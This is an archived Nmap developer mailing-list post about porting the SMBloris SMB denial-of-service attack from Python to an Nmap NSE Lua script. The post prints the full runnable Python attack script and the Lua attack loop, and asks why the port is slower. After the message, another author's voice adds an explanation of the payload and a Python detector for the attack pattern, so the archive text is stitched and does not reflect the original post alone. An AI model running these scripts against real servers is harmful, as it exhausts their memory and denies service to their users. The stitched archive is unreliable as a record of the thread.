Nmap Development mailing list archives
NSE-nsock issues?
From: Wong Wai Tuck <wongwaituck () gmail com>
Date: Thu, 24 Aug 2017 15:40:39 +0000
Hey list, I am currently facing a problem and was hoping someone could clarify this odd behaviour. I was implementing the smb-smbloris script and I faced this odd issue which did not occur in the Python implementation of smbloris, and was wondering if anyone could provide any insights as to why this is happening.

Here is the original smbloris in Python (written by zerosum0x0):

```python
import sys
import socket
import resource

rhost = sys.argv[1]
rport = sys.argv[2]

# raise the open-file limit so one socket per source port fits
resource.setrlimit(resource.RLIMIT_NOFILE, (70000, 70000))

sks = {}
while True:
    for lport in range(1, 65536):
        try:
            # recycle the socket previously bound to this source port
            if lport in sks:
                sks[lport].close()
            sk = socket.socket()
            sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
            sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            sk.bind(('0.0.0.0', lport))
            sk.connect((rhost, int(rport)))
            # only the 4-byte NBSS header is sent (bytes literal so it runs under Python 3 too)
            sk.send(b'\x00\x01\xff\xff')
            sks[lport] = sk
        except Exception as e:
            print("%s - Port: %d" % (str(e), lport))
```

The script executes well. However, the Lua implementation that I have made for NSE performs poorly:

```lua
local nmap = require "nmap"
local stdnse = require "stdnse"

-- host_down, timed_out, skts, SMBLORIS_PAYLOAD, timeout, script_start,
-- mean, ci and check_alive are defined elsewhere in the script (see the PR below)

local function send_dos(host, port, src_port)
  if host_down then return end
  -- recycle the socket previously bound to this source port
  local oldsocket = skts[src_port]
  if oldsocket then
    oldsocket:close()
  end
  local socket = nmap.new_socket()
  local try = nmap.new_try()
  stdnse.debug1("Trying to send from %s", src_port)
  try(socket:bind("0.0.0.0", src_port))
  local status, err = socket:connect(host, port)
  if status then
    socket:send(SMBLORIS_PAYLOAD)
    if not oldsocket then
      table.insert(skts, socket)
    else
      skts[src_port] = socket
    end
  end
end

-- inside the action function
while not timed_out or not host_down do
  -- using 65000 instead of 65535 prevents crash of too many files open
  for i = 1, 65000, 1 do
    send_dos(host, port, i)
    if i % 1000 == 0 and i <= 60000 then
      -- prevents crash when i >= 61000
      check_alive(host, mean, ci)
    end
    -- has it timed out yet?
    if nmap.clock() - timeout >= script_start then
      stdnse.debug1("Script timed out at %s", timeout)
      break
    end
  end
end
```

You can find the full script in the PR here [2].
Even after commenting out the differences for the following lines in the Python implementation:

```python
resource.setrlimit(resource.RLIMIT_NOFILE, (70000, 70000))
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
```

the Python implementation still outperforms the NSE implementation, even though the code is nearly identical. The results can be found here [1].

I have tried playing with the timeouts, using OS-given sockets instead of assigning my own, and using threads (which ironically made it perform even worse), and I can't seem to get it to work better. Additionally, and I am not sure if this is the cause, I noticed that as more connections are made, the speed at which the connections are made is much slower in NSE than in the Python implementation. I am not exactly sure what the cause is, but if someone could point me in the right direction that would be helpful! I have tried to adjust the min-rate argument, as well as the max-parallelism argument (which is apparently used in the nsock NSE file from what I read from the source), both of which did not have the effect I was hoping for.

[1]: http://imgur.com/a/AAdG3
[2]: https://github.com/nmap/nmap/pull/983

Wai Tuck
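The payload both scripts above send is just the 4-byte NetBIOS session header "\x00\x01\xff\xff": message type 0, the length-extension flag set, and a 16-bit length of 0xffff, so the client advertises a 0x1ffff-byte session message and then sends nothing. As an added example from the defender's side (my code, not the poster's script nor anything from the Nmap PR), the following parses that header, checks the advertised length, and counts how many distinct source ports per client IP open a 445/139 connection this way. The connection-record layout, the constructed sample records and the threshold of 50 distinct ports are assumptions.

```python
import struct
from collections import defaultdict

# NBSS (NetBIOS Session Service) header on TCP 445/139: 1 byte type, 1 byte flags
# (bit 0 extends the length by a 17th bit), 2 bytes big-endian length.
NBSS_SESSION_MESSAGE = 0x00
# "\x00\x01\xff\xff" from the thread advertises (1 << 16) | 0xffff = 131071 bytes.
SMBLORIS_CLAIMED_LENGTH = 0x1FFFF


def parse_nbss_header(data):
    """Return (msg_type, claimed_length) from the first 4 bytes of a session stream."""
    if len(data) < 4:
        raise ValueError("need at least 4 bytes of NBSS header")
    msg_type, flags, length = struct.unpack("!BBH", data[:4])
    claimed = ((flags & 0x01) << 16) | length
    return msg_type, claimed


def looks_like_smbloris(first_bytes, bytes_after_header):
    """A session message claiming the maximum length with no body following it."""
    msg_type, claimed = parse_nbss_header(first_bytes)
    return (msg_type == NBSS_SESSION_MESSAGE
            and claimed == SMBLORIS_CLAIMED_LENGTH
            and bytes_after_header == 0)


def flag_sources(records, threshold=50):
    """Count distinct source ports per client IP whose connection opens with the
    SMBloris pattern; return the clients at or above the threshold (assumed value)."""
    ports_by_ip = defaultdict(set)
    for src_ip, src_port, head, rest in records:
        if looks_like_smbloris(head, rest):
            ports_by_ip[src_ip].add(src_port)
    return {ip: len(ports) for ip, ports in ports_by_ip.items() if len(ports) >= threshold}


# Constructed sample records (assumed layout):
#   (client IP, client source port, first 4 bytes sent, bytes sent after the header)
SAMPLE_RECORDS = (
    [("10.0.0.5", p, b"\x00\x01\xff\xff", 0) for p in range(1, 61)]
    + [("10.0.0.9", 51001, b"\x00\x00\x00\x2f", 47),   # ordinary 47-byte session message
       ("10.0.0.9", 51002, b"\x00\x01\xff\xff", 0)]    # one oversized header alone stays under threshold
)

if __name__ == "__main__":
    print(parse_nbss_header(b"\x00\x01\xff\xff"))
    print(flag_sources(SAMPLE_RECORDS))
```

A single oversized header is not suspicious on its own; the signal is many simultaneous connections from one client, each bound to a different source port, which is exactly what the loops in both scripts above produce.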
_______________________________________________
Sent through the dev mailing list
https://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/